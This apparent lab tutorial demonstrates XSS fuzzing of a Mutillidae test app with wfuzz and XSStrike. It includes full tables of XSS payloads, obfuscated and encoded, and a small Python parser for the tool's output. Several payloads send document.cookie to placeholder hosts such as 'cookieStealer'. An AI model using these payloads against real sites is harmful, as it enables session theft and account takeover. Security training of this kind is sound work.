Wfuzz is another popular web application fuzzer; it is used not only to find XSS vulnerabilities but also SQL injection, hidden directories, form parameters, and more. It ships with Kali by default.
wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/XSS.txt http://172.16.1.102/mutillidae/index.php?page=FUZZ
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.2.11 - The Web Fuzzer *
********************************************************
Target: http://172.16.1.102/mutillidae/index.php?page=FUZZ
Total requests: 39
==================================================================
ID Response Lines Word Chars Payload
==================================================================
000020: C=200 514 L 1425 W 21898 Ch "<IMG%20SRC=`javascript:alert("'WXSS'")`>"
000019: C=200 514 L 1425 W 21812 Ch "<IMG%20SRC=javascript:alert("WXSS")>"
000021: C=200 514 L 1425 W 21983 Ch "<IMG%20"""><SCRIPT>alert("WXSS")</SCRIPT>">"
000001: C=200 514 L 1420 W 21769 Ch ""><script>""
000003: C=200 514 L 1420 W 21907 Ch "<<script>alert("WXSS");//<</script>"
000016: C=200 514 L 1425 W 21877 Ch "<IMG%20SRC="javascript:alert('WXSS')""
000015: C=200 514 L 1425 W 21893 Ch "<IMG%20SRC="javascript:alert('WXSS');">"
000002: C=200 514 L 1420 W 21870 Ch "<script>alert("WXSS")</script>"
000018: C=200 514 L 1425 W 21858 Ch "<IMG%20SRC=JaVaScRiPt:alert('WXSS')>"
000017: C=200 514 L 1425 W 21858 Ch "<IMG%20SRC=javascript:alert('WXSS')>"
000022: C=200 514 L 1425 W 21973 Ch "<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>"
000023: C=200 514 L 1425 W 21762 Ch "<IMG%20SRC='javasc ript:alert(document.cookie)'>"
000024: C=200 514 L 1425 W 21757 Ch "<IMG%20SRC="jav ascript:alert('WXSS');">"
000025: C=200 514 L 1425 W 21757 Ch "<IMG%20SRC="jav	ascript:alert('WXSS');">"
000027: C=200 514 L 1425 W 21757 Ch "<IMG%20SRC="jav
ascript:alert('WXSS');">"
000030: C=200 514 L 1425 W 21903 Ch "<IMG%20LOWSRC="javascript:alert('WXSS')">"
000029: C=200 514 L 1425 W 21903 Ch "<IMG%20DYNSRC="javascript:alert('WXSS')">"
000026: C=200 514 L 1425 W 21757 Ch "<IMG%20SRC="jav
ascript:alert('WXSS');">"
000028: C=200 514 L 1430 W 21747 Ch "<IMG%20SRC="%20%20javascript:alert('WXSS');">"
000031: C=200 514 L 1425 W 22060 Ch "<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>"
000032: C=200 514 L 1425 W 21727 Ch "<IMG%20SRC=javascript:alert('XSS')>"
000033: C=200 514 L 1425 W 21727 Ch "<IMG%20SRC=javascript:alert('XSS')>"
000034: C=200 514 L 1425 W 21727 Ch "<IMG%20SRC=javascript:alert('XSS')>"
000036: C=200 514 L 1425 W 22191 Ch ""><script>document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie</script>"
000037: C=200 514 L 1425 W 22196 Ch "%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E"
000035: C=200 514 L 1425 W 21950 Ch "'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E"
000039: C=200 514 L 1420 W 21763 Ch "'';!--"<XSS>=&{()}"
000038: C=200 514 L 1420 W 22883 Ch "';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}"
000005: C=200 514 L 1420 W 21911 Ch "'><script>alert(document.cookie)</script>"
000004: C=200 514 L 1420 W 21895 Ch "<script>alert(document.cookie)</script>"
000006: C=200 514 L 1420 W 21916 Ch "'><script>alert(document.cookie);</script>"
000007: C=200 514 L 1420 W 21776 Ch "\";alert('XSS');//"
000008: C=200 514 L 1420 W 21875 Ch "%3cscript%3ealert("WXSS");%3c/script%3e"
000009: C=200 514 L 1420 W 21900 Ch "%3cscript%3ealert(document.cookie);%3c%2fscript%3e"
000010: C=200 514 L 1425 W 21875 Ch "%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E"
000011: C=200 563 L 1570 W 24175 Ch "<script>alert(document.cookie);</script>"
000012: C=200 563 L 1570 W 24175 Ch "<script>alert(document.cookie);<script>alert"
000013: C=200 514 L 1420 W 21964 Ch "<xss><script>alert('WXSS')</script></vulnerable>"
000014: C=200 514 L 1425 W 21913 Ch "<IMG%20SRC='javascript:alert(document.cookie)'>"
Example of applying URL encoding to the payloads (the urlencode encoder):
wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/XSS.txt,urlencode http://172.16.1.102/mutillidae/index.php?page=FUZZ
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.2.11 - The Web Fuzzer *
********************************************************
Target: http://172.16.1.102/mutillidae/index.php?page=FUZZ
Total requests: 39
==================================================================
ID Response Lines Word Chars Payload
==================================================================
000003: C=200 514 L 1420 W 21907 Ch "%3C%3Cscript%3Ealert%28%22WXSS%22%29%3B//%3C%3C/script%3E"
000002: C=200 514 L 1420 W 21870 Ch "%3Cscript%3Ealert%28%22WXSS%22%29%3C/script%3E"
000001: C=200 514 L 1420 W 21769 Ch "%22%3E%3Cscript%3E%22"
000007: C=200 514 L 1420 W 21776 Ch "%5C%22%3Balert%28%27XSS%27%29%3B//"
000005: C=200 514 L 1420 W 21911 Ch "%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E"
000009: C=200 514 L 1420 W 21926 Ch "%253cscript%253ealert%28document.cookie%29%3B%253c%252fscript%253e"
000008: C=200 514 L 1420 W 21891 Ch "%253cscript%253ealert%28%22WXSS%22%29%3B%253c/script%253e"
000004: C=200 514 L 1420 W 21895 Ch "%3Cscript%3Ealert%28document.cookie%29%3C/script%3E"
000010: C=200 514 L 1420 W 21901 Ch "%253Cscript%253Ealert%28%2522X%2520SS%2522%29%3B%253C/script%253E"
000006: C=200 514 L 1420 W 21916 Ch "%27%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C/script%3E"
000011: C=200 514 L 1420 W 21924 Ch "%26ltscript%26gtalert%28document.cookie%29%3B%3C/script%3E"
000015: C=200 514 L 1420 W 21903 Ch "%3CIMG%2520SRC%3D%22javascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000012: C=200 514 L 1420 W 21968 Ch "%26ltscript%26gtalert%28document.cookie%29%3B%26ltscript%26gtalert"
000014: C=200 514 L 1420 W 21923 Ch "%3CIMG%2520SRC%3D%27javascript%3Aalert%28document.cookie%29%27%3E"
000019: C=200 514 L 1420 W 21934 Ch "%3CIMG%2520SRC%3Djavascript%3Aalert%28%26quot%3BWXSS%26quot%3B%29%3E"
000013: C=200 514 L 1420 W 21964 Ch "%3Cxss%3E%3Cscript%3Ealert%28%27WXSS%27%29%3C/script%3E%3C/vulnerable%3E"
000016: C=200 514 L 1420 W 21887 Ch "%3CIMG%2520SRC%3D%22javascript%3Aalert%28%27WXSS%27%29%22"
000017: C=200 514 L 1420 W 21868 Ch "%3CIMG%2520SRC%3Djavascript%3Aalert%28%27WXSS%27%29%3E"
000018: C=200 514 L 1420 W 21868 Ch "%3CIMG%2520SRC%3DJaVaScRiPt%3Aalert%28%27WXSS%27%29%3E"
000020: C=200 514 L 1420 W 21908 Ch "%3CIMG%2520SRC%3D%60javascript%3Aalert%28%22%27WXSS%27%22%29%60%3E"
000022: C=200 514 L 1420 W 21983 Ch "%3CIMG%2520SRC%3Djavascript%3Aalert%28String.fromCharCode%2888%2C83%2C83%29%29%3E"
000021: C=200 514 L 1420 W 21993 Ch "%3CIMG%2520%22%22%22%3E%3CSCRIPT%3Ealert%28%22WXSS%22%29%3C/SCRIPT%3E%22%3E"
000023: C=200 514 L 1425 W 21928 Ch "%3CIMG%2520SRC%3D%27javasc%09ript%3Aalert%28document.cookie%29%27%3E"
000025: C=200 514 L 1420 W 21941 Ch "%3CIMG%2520SRC%3D%22jav%26%23x09%3Bascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000024: C=200 514 L 1425 W 21908 Ch "%3CIMG%2520SRC%3D%22jav%09ascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000028: C=200 514 L 1420 W 21966 Ch "%3CIMG%2520SRC%3D%22%2520%26%2314%3B%2520javascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000027: C=200 514 L 1420 W 21941 Ch "%3CIMG%2520SRC%3D%22jav%26%23x0D%3Bascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000030: C=200 514 L 1420 W 21913 Ch "%3CIMG%2520LOWSRC%3D%22javascript%3Aalert%28%27WXSS%27%29%22%3E"
000026: C=200 514 L 1420 W 21941 Ch "%3CIMG%2520SRC%3D%22jav%26%23x0A%3Bascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000029: C=200 514 L 1420 W 21913 Ch "%3CIMG%2520DYNSRC%3D%22javascript%3Aalert%28%27WXSS%27%29%22%3E"
000031: C=200 514 L 1420 W 22118 Ch "%3CIMG%2520SRC%3D%27%2526%2523x6a%3Bavasc%2526%2523000010ript%3Aa%2526%2523x6c%3Bert%28document.%2526%2523x63%3Bookie%29%27%3E"
000032: C=200 514 L 1420 W 22562 Ch "%3CIMG%2520SRC%3D%26%23106%3B%26%2397%3B%26%23118%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2358%3B%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%26%2340%3B%26%2339%3B%26%2388%3B%26%2383%3B%26%2383%3B%26%2339%3B%26%2341%3B%3E"
000033: C=200 514 L 1420 W 22967 Ch "%3CIMG%2520SRC%3D%26%230000106%26%230000097%26%230000118%26%230000097%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000058%26%230000097%26%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000039%26%230000088%26%230000083%26%230000083%26%230000039%26%230000041%3E"
000035: C=200 514 L 1420 W 21996 Ch "%27%253CIFRAME%2520SRC%3Djavascript%3Aalert%28%252527XSS%252527%29%253E%253C/IFRAME%253E"
000034: C=200 514 L 1420 W 22507 Ch "%3CIMG%2520SRC%3D%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3E"
000036: C=200 514 L 1420 W 22191 Ch "%22%3E%3Cscript%3Edocument.location%3D%27http%3A//cookieStealer/cgi-bin/cookie.cgi%3F%27%2Bdocument.cookie%3C/script%3E"
000037: C=200 514 L 1420 W 22396 Ch "%2522%253E%253Cscript%253Edocument%252Elocation%253D%2527http%253A%252F%252Fyour%252Esite%252Ecom%252Fcgi%252Dbin%252Fcookie%252Ecgi%253F%2527%2520%252Bdocument%252Ecookie%253C%252Fscript%253E"
000038: C=200 514 L 1420 W 22906 Ch "%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%3E%3C/SCRIPT%3E%21--%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C/SCRIPT%3E%3D%26%7B%7D"
000039: C=200 514 L 1420 W 21796 Ch "%27%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D"
Total time: 27.33954
Processed Requests: 39
Filtered Requests: 0
Requests/sec.: 1.426505
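Reading these tables by hand is tedious: every payload comes back 200, so the rows worth a second look are the ones whose shape differs from the crowd (000011 and 000012 above, with 563 lines instead of 514), and the urlencode run shows that wfuzz quotes the whole wordlist entry, so entries that are already percent-encoded go out double-encoded and the server sees a literal %3c rather than <. The following is an added example, not code from wfuzz or from this page; the sample rows are constructed in the output format shown above, and the encoder is modelled on urllib.parse.quote because that reproduces the page's encoded payloads exactly.

```python
import re
from collections import Counter
from urllib.parse import quote, unquote

# Constructed sample rows in wfuzz's default output format:
# "<id>: C=<code> <lines> L <words> W <chars> Ch "<payload>""
SAMPLE = '''\
000002: C=200 514 L 1420 W 21870 Ch "<script>alert("WXSS")</script>"
000008: C=200 514 L 1420 W 21875 Ch "%3cscript%3ealert("WXSS");%3c/script%3e"
000011: C=200 563 L 1570 W 24175 Ch "<script>alert(document.cookie);</script>"
000012: C=200 563 L 1570 W 24175 Ch "<script>alert(document.cookie);<script>alert"
000028: C=200 514 L 1430 W 21747 Ch "<IMG%20SRC="%20%20javascript:alert('WXSS');">"
'''

LINE_RE = re.compile(r'^(\d+):\s+C=(\d+)\s+(\d+) L\s+(\d+) W\s+(\d+) Ch\s+"(.*)"$')

def parse_wfuzz(text):
    """Turn wfuzz result lines into dicts; banner and summary lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rid, code, lines, words, chars, payload = m.groups()
            rows.append({"id": rid, "code": int(code), "lines": int(lines),
                         "words": int(words), "chars": int(chars), "payload": payload})
    return rows

def baseline(rows):
    # The most common (status, line count) pair is the "nothing happened" response.
    # Chars and words track payload length, so they make a noisy baseline.
    return Counter((r["code"], r["lines"]) for r in rows).most_common(1)[0][0]

def outliers(rows):
    """IDs whose response shape differs from the baseline and deserve manual review."""
    base = baseline(rows)
    return [r["id"] for r in rows if (r["code"], r["lines"]) != base]

def encode_like_wfuzz(payload):
    # Assumption: wfuzz's urlencode encoder behaves like quote() with '/' left unescaped,
    # which is consistent with every encoded row in the output above.
    return quote(payload, safe="/")

def double_encoded(payload):
    """True if a wordlist entry already contains %xx escapes and would be sent double-encoded."""
    return unquote(payload) != payload

def report(text):
    rows = parse_wfuzz(text)
    return {"outliers": outliers(rows),
            "double_encoded": [r["id"] for r in rows if double_encoded(r["payload"])]}
```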
XSStrike is a dedicated suite for detecting cross-site scripting vulnerabilities; it includes an intelligent payload generator, a fuzzer, a crawler, WAF detection, and more. XSStrike is currently in beta.
It is well documented on its GitHub page.
python3 xsstrike.py -u http://172.16.1.102/mutillidae/index.php?page=dns-lookup.php
XSStrike v3.0-beta
[~] Checking for DOM vulnerabilities
------------------------------------------------------------
52 //document.getElementById("idSystemInformationHeading").innerHTML = l_loginMessage;
53 document.getElementById("idHintsStatusHeading").innerHTML = 'Hints: ' + l_hintsStatus;
54 document.getElementById("idSecurityLevelHeading").innerHTML = 'Security Level: ' + l_securityLevel + ' (' + l_securityLevelDescription + ')';
446 Google Hacking Database
495 <a onclick="document.location.href='';"
584 window.localStorage.setItem("LocalStorageTarget","This is set by the index.php page");
585 window.sessionStorage.setItem("SessionStorageTarget","This is set by the index.php page");
------------------------------------------------------------
[+] Potentially vulnerable objects found
[+] WAF Status: Offline
[!] Testing parameter: page
[!] Reflections found: 4
[~] Analysing reflections
[~] Generating payloads
[!] Payloads generated: 9256
------------------------------------------------------------
[+] Payload: "><A%0aoNMOUseoveR%0d=%0d(confirm)() x>z
[!] Efficiency: 100
[!] Cofidence: 10
[?] Would you like to continue scanning? [y/N]